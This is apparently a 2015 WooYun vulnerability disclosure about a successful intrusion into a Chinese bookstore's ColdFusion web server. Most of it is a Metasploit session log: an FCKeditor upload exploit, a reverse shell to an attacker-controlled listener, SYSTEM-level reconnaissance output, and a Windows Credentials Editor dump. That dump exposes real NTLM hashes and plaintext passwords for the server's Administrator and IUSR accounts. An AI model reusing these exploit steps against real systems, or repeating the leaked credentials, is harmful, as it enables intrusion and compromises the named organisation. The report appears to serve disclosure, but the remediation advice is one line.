当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093090

漏洞标题:三联书店成功入侵事件

相关厂商:北京云因信息技术有限公司

漏洞作者: 路人甲

提交时间:2015-01-21 19:08

修复时间:2015-03-07 19:10

公开时间:2015-03-07 19:10

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

三联书店www.sdxjpc.com成功入侵事件

详细说明:

1#扫目录成功扫描到fck路径

http://www.sdxjpc.com/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm


2#在msf搜索coldfusion找到相应的fck利用程序

msf > search coldfusion
exploit/windows/http/coldfusion_fckeditor 2009-07-03 excellent ColdFusion 8.0.1 Arbitrary File Upload and Execute


设置相应参数

msf > use exploit/windows/http/coldfusion_fckeditor
sf exploit(coldfusion_fckeditor) > set RHOST www.sdxjpc.com
msf exploit(coldfusion_fckeditor) > set payload generic/shell_reverse_tcp
msf exploit(coldfusion_fckeditor) > set LHOST XX.XX.XX.XX
msf exploit(coldfusion_fckeditor) > set LPORT 8888


运行payload
msf exploit(coldfusion_fckeditor) > run
[*] Started reverse handler on XX.XX.XX.XX:8888
[*] Sending our POST request...
[*] Upload succeeded! Executing payload...
[*] Command shell session 2 opened (XX.XX.XX.XX:8888 -> 119.40.39.235:4975) at 2015-01-21 10:56:39 +0800
Microsoft Windows XP [�汾 5.2.3790]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.
d:\ColdFusion8\runtime\bin>ver
ver
Microsoft Windows XP [�汾 5.2.3790]
</code>
执行其他命令

d:\ColdFusion8\runtime\bin>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : sdxjpc
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter ��������:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : BCM5703 Gigabit Ethernet
Physical Address. . . . . . . . . : 00-0E-7F-AF-2F-C2
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 119.40.39.235
Subnet Mask . . . . . . . . . . . : 255.255.255.248
Default Gateway . . . . . . . . . : 119.40.39.233
DNS Servers . . . . . . . . . . . : 202.106.0.20
202.106.196.115
d:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\system
d:\ColdFusion8\runtime\bin>netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:818 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1033 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1034 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1521 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2030 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2100 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2522 0.0.0.0:0 LISTENING
TCP 0.0.0.0:2930 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3339 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:6085 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7778 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7999 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8228 0.0.0.0:0 LISTENING
TCP 0.0.0.0:51800 0.0.0.0:0 LISTENING
TCP 119.40.39.235:80 58.241.44.230:42268 ESTABLISHED
TCP 119.40.39.235:80 58.241.44.230:42269 ESTABLISHED
TCP 119.40.39.235:80 58.241.44.230:42273 ESTABLISHED
TCP 119.40.39.235:80 58.241.44.230:42275 ESTABLISHED
TCP 119.40.39.235:80 58.241.44.230:42281 ESTABLISHED
TCP 119.40.39.235:80 58.241.44.230:42286 ESTABLISHED
TCP 119.40.39.235:80 60.179.37.138:51331 ESTABLISHED
TCP 119.40.39.235:80 61.181.252.6:1926 TIME_WAIT
TCP 119.40.39.235:80 61.181.252.6:1931 ESTABLISHED
TCP 119.40.39.235:80 61.181.252.6:1936 TIME_WAIT
TCP 119.40.39.235:80 61.181.252.6:1937 ESTABLISHED
TCP 119.40.39.235:80 101.226.168.237:16189 TIME_WAIT
TCP 119.40.39.235:80 124.115.230.60:4327 ESTABLISHED
TCP 119.40.39.235:80 171.12.108.172:61462 TIME_WAIT
TCP 119.40.39.235:80 192.235.78.36:39219 TIME_WAIT
TCP 119.40.39.235:80 192.235.78.36:53757 FIN_WAIT_2
TCP 119.40.39.235:80 192.235.78.36:60080 FIN_WAIT_2
TCP 119.40.39.235:80 192.235.78.36:60721 TIME_WAIT
TCP 119.40.39.235:80 218.22.116.68:50176 ESTABLISHED
TCP 119.40.39.235:80 218.30.103.81:34292 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63414 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63416 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63417 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63492 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63493 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63500 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63508 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63510 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63511 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63545 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63665 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63673 TIME_WAIT
TCP 119.40.39.235:80 222.73.51.225:63674 ESTABLISHED
TCP 119.40.39.235:80 222.73.51.225:63682 ESTABLISHED
TCP 119.40.39.235:80 222.73.51.225:63683 ESTABLISHED
TCP 119.40.39.235:80 222.73.51.225:63684 ESTABLISHED
TCP 119.40.39.235:80 222.187.46.193:56742 TIME_WAIT
TCP 119.40.39.235:80 222.187.46.193:56743 ESTABLISHED
TCP 119.40.39.235:80 222.187.46.193:56748 TIME_WAIT
TCP 119.40.39.235:80 222.187.46.193:56756 TIME_WAIT
TCP 119.40.39.235:139 0.0.0.0:0 LISTENING
TCP 119.40.39.235:1035 119.40.39.235:1521 ESTABLISHED
TCP 119.40.39.235:1059 119.40.39.235:1060 ESTABLISHED
TCP 119.40.39.235:1060 119.40.39.235:1059 ESTABLISHED
TCP 119.40.39.235:1061 192.235.78.36:6666 ESTABLISHED
TCP 119.40.39.235:1521 119.40.39.235:1035 ESTABLISHED
TCP 119.40.39.235:3389 218.57.128.242:49751 ESTABLISHED
TCP 119.40.39.235:4958 192.168.0.49:1521 TIME_WAIT
TCP 119.40.39.235:4972 192.168.0.49:1521 TIME_WAIT
TCP 119.40.39.235:4975 192.235.78.36:8888 TIME_WAIT
TCP 127.0.0.1:1029 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1029 127.0.0.1:1026 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1028 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1032 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1037 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1039 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1041 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1043 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1045 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1047 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1049 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1051 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1054 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1057 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1059 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1063 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1065 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1067 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1069 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1071 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1073 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1075 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1077 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1081 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1083 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1088 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:1090 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4966 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4968 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4974 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4977 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4979 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4981 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4983 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4985 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4987 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4989 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4991 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4993 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4995 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4997 TIME_WAIT
TCP 127.0.0.1:1029 127.0.0.1:4999 TIME_WAIT
TCP 127.0.0.1:1031 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1031 127.0.0.1:1027 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1030 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1036 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1038 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1040 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1042 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1044 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1046 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1048 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1050 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1056 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1058 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1062 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1064 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1066 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1068 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1070 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1072 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1074 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1076 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1078 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1080 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1082 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1085 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1087 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:1089 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4965 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4967 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4970 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4973 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4976 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4978 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4980 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4982 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4984 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4986 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4988 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4990 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4992 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4994 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4996 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:4998 TIME_WAIT
TCP 127.0.0.1:1031 127.0.0.1:5000 TIME_WAIT
TCP 127.0.0.1:1052 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1084 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:1084 ESTABLISHED
TCP 127.0.0.1:4164 127.0.0.1:51800 ESTABLISHED
TCP 127.0.0.1:4607 127.0.0.1:51800 ESTABLISHED
TCP 127.0.0.1:51800 127.0.0.1:4164 ESTABLISHED
TCP 127.0.0.1:51800 127.0.0.1:4607 ESTABLISHED
UDP 0.0.0.0:445 *:*
UDP 119.40.39.235:123 *:*
UDP 119.40.39.235:137 *:*
UDP 119.40.39.235:138 *:*
UDP 127.0.0.1:123 *:*


抓hash密码

C:\>wce.txt -l
wce.txt -l
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Administrator:SDXJPC:00000000000000000000000000000000:B2411B80DB1D162892FCCBC5A5B9C039
SDXJPC$:WORKGROUP:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
IUSR_SDXJPC:SDXJPC:A0003396A423039D97A6AF467D7DC765:E8A716FA9DABF64213E263D12831E7ED
C:\>wce.txt -w
wce.txt -w
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Administrator\SDXJPC:sdxdatabase@fhqs
SDXJPC$\WORKGROUP:
IUSR_SDXJPC\SDXJPC:&y5E=G=P63wB9m


漏洞证明:

1.jpg


2.jpg


修复方案:

FCK编辑器设置权限

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝